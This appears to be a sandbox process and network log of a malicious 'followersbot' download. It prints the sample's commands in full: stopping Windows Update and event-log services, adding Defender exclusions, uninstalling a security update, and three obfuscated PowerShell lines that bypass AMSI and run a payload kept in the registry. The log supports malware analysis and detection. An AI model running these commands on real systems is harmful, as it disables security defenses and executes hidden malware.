C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:erecUyBKkUxD{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cgvWXsDCHZbLGT,[Parameter(Position=1)][Type]$bXKWGCdfKN)$ChuGcCDErKR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'fl'+'e'+''+[Char](99)+''+'t'+''+[Char](101)+'dD'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+'mor'+[Char](121)+'M'+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e'+'T'+''+'y'+''+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+''+'i'+''+'C'+'la'+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+'l'+'a'+'s'+'s'+'',[MulticastDelegate]);$ChuGcCDErKR.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+'Na'+[Char](109)+'e'+','+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cgvWXsDCHZbLGT).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ChuGcCDErKR.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+'S'+[Char](105)+'g,'+'N'+'ew'+'S'+''+[Char](108)+'ot'+','+'V'+'i'+'r'+'t'+''+'u'+''+[Char](97)+'l',$bXKWGCdfKN,$cgvWXsDCHZbLGT).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+'m'+'e'+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');Write-Output $ChuGcCDErKR.CreateType();}$ZrqQNGUtvCJil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType('M'+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+'sa'+'f'+'e'+'N'+'a'+[Char](116)+''+'i'+''+[Char](118)+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$UyIwMnRWFMetix=$ZrqQNGUtvCJil.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'dr'+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags]('P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](116)+'atic'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TPRIERKWTPoyHazJIDh=erecUyBKkUxD @([String])([IntPtr]);$zTGJYCarGFeLJUMHYnbjGP=erecUyBKkUxD @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OPuhQtqlaYd=$ZrqQNGUtvCJil.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'ne'+'l'+''+[Char](51)+''+'2'+'.'+'d'+''+'l'+'l')));$XEcoJPRbXlTNgs=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$kqwYXhPMqdADFvAjN=$UyIwMnRWFMetix.Invoke($Null,@([Object]$OPuhQtqlaYd,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TLCpCfA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XEcoJPRbXlTNgs,$TPRIERKWTPoyHazJIDh).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$PMQjRqMgBzukPdxFW=$UyIwMnRWFMetix.Invoke($Null,@([Object]$TLCpCfA,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+'iS'+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+'f'+''+'f'+'e'+[Char](114)+'')));$lhgbXNAFkV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,4,[ref]$lhgbXNAFkV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$PMQjRqMgBzukPdxFW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kqwYXhPMqdADFvAjN,$zTGJYCarGFeLJUMHYnbjGP).Invoke($PMQjRqMgBzukPdxFW,[uint32]8,0x20,[ref]$lhgbXNAFkV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+[Char](97)+'l'+[Char](101)+'r'+'s'+''+[Char](116)+''+'a'+''+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{1eaf5f63-d604-464a-bcac-c2536bd526c0}

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{5bacf96c-67db-4c19-9a07-6b84bce6b458}

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,5069776657743921146,10754630265381878613,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5060 /prefetch:2

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\9SHCODL.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\followersbot\FOLLOWERBOTSTART.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Downloads\followersbot\9SHCODL.exe

"C:\Users\Admin\Downloads\followersbot\\9SHCODL.exe"

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\\A9LDCODL.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "HIUOFKBL"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:jsBBwFSiMSOA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XuIAgtFPvYHavm,[Parameter(Position=1)][Type]$MKdDtJgvOg)$PfHYSRNxgZY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+''+'d'+''+'D'+'e'+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+'e'+'mory'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'eT'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+'P'+'u'+'b'+'li'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+','+'Ans'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'Au'+[Char](116)+''+'o'+'C'+'l'+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$PfHYSRNxgZY.DefineConstructor('R'+'T'+'Speci'+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XuIAgtFPvYHavm).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$PfHYSRNxgZY.DefineMethod(''+[Char](73)+''+'n'+'v'+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'By'+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+'i'+''+'r'+''+[Char](116)+''+'u'+'al',$MKdDtJgvOg,$XuIAgtFPvYHavm).SetImplementationFlags('Ru'+'n'+''+[Char](116)+'i'+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $PfHYSRNxgZY.CreateType();}$kOKbJiaYMLkQT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'i'+'n'+'3'+'2'+''+[Char](46)+'U'+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+'v'+''+'e'+''+'M'+''+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$rQBPZBFvyUurXj=$kOKbJiaYMLkQT.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c,S'+'t'+''+[Char](97)+'t'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EVZUuzjgWrLikZEaeyU=jsBBwFSiMSOA @([String])([IntPtr]);$orpEguWPHkXPZXrXjbVVBO=jsBBwFSiMSOA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IOkfBEGHQYW=$kOKbJiaYMLkQT.GetMethod(''+'G'+'e'+'t'+''+'M'+'o'+'d'+'ul'+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+'e'+'l'+''+[Char](51)+''+[Char](50)+''+'.'+'d'+'l'+''+'l'+'')));$rUlkBNhpIGipZg=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+'i'+''+[Char](98)+'r'+[Char](97)+'ry'+[Char](65)+'')));$ofwiIbrtKmiJKaSTR=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$IOkfBEGHQYW,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$pHaTkJQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($rUlkBNhpIGipZg,$EVZUuzjgWrLikZEaeyU).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+'i'+''+'.'+''+[Char](100)+'l'+[Char](108)+'');$ASBwPxmhZsbsjPPRa=$rQBPZBFvyUurXj.Invoke($Null,@([Object]$pHaTkJQ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+'er')));$ewTJZjpilC=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,4,[ref]$ewTJZjpilC);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ASBwPxmhZsbsjPPRa,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ofwiIbrtKmiJKaSTR,$orpEguWPHkXPZXrXjbVVBO).Invoke($ASBwPxmhZsbsjPPRa,[uint32]8,0x20,[ref]$ewTJZjpilC);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+'l'+''+[Char](101)+'r'+'s'+'t'+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:iDHfkoMYkNLb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QsmjiEJnYbJzNN,[Parameter(Position=1)][Type]$YWzTSnRgNX)$DilHVAVClKq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'ef'+[Char](108)+''+[Char](101)+''+[Char](99)+'ted'+'D'+'e'+[Char](108)+''+'e'+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+'dul'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+'l'+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](65)+'ut'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DilHVAVClKq.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+'i'+''+'a'+'lN'+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+'ub'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$QsmjiEJnYbJzNN).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+'d'+'');$DilHVAVClKq.DefineMethod(''+[Char](73)+''+'n'+''+'v'+'o'+'k'+''+'e'+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'wSl'+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+'',$YWzTSnRgNX,$QsmjiEJnYbJzNN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+'e'+''+[Char](100)+'');Write-Output $DilHVAVClKq.CreateType();}$ycRQcpyqZDPil=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+'t'+''+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+'U'+'n'+''+'s'+''+[Char](97)+'fe'+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+'s');$KkyKndUTItPXvG=$ycRQcpyqZDPil.GetMethod(''+'G'+'e'+[Char](116)+'Pro'+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'ess',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+'i'+''+[Char](99)+','+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UVbndFTogdwGxvFnyAt=iDHfkoMYkNLb @([String])([IntPtr]);$zCwhPmYmctrvPRsuRzyVxM=iDHfkoMYkNLb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uHiiOMqiOqk=$ycRQcpyqZDPil.GetMethod('G'+[Char](101)+'t'+[Char](77)+'od'+'u'+'l'+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+'l'+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$QyKHXnkBaPmncH=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+''+'L'+'i'+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$XcLbDrsjcythStgYh=$KkyKndUTItPXvG.Invoke($Null,@([Object]$uHiiOMqiOqk,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'r'+[Char](111)+'te'+[Char](99)+''+[Char](116)+'')));$VwTyIoZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyKHXnkBaPmncH,$UVbndFTogdwGxvFnyAt).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$ahOoZlrjRInzsvYNc=$KkyKndUTItPXvG.Invoke($Null,@([Object]$VwTyIoZ,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$QHEEOMZuNl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,4,[ref]$QHEEOMZuNl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ahOoZlrjRInzsvYNc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XcLbDrsjcythStgYh,$zCwhPmYmctrvPRsuRzyVxM).Invoke($ahOoZlrjRInzsvYNc,[uint32]8,0x20,[ref]$QHEEOMZuNl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+'W'+''+'A'+'R'+'E'+'').GetValue(''+[Char](100)+'ialers'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{844601dd-43a6-4ada-ac04-3f4917639d60}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{41a3914e-4c27-4356-b8f7-21113d07cebe}

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 480 -p 5688 -ip 5688

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5688 -s 280

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe

"C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\followersbot\saved_users.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 bit.ly udp
US 67.199.248.10:443 bit.ly tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 10.248.199.67.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav.smartscreen.microsoft.com tcp
US 8.8.8.8:53 data-edge.smartscreen.microsoft.com udp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
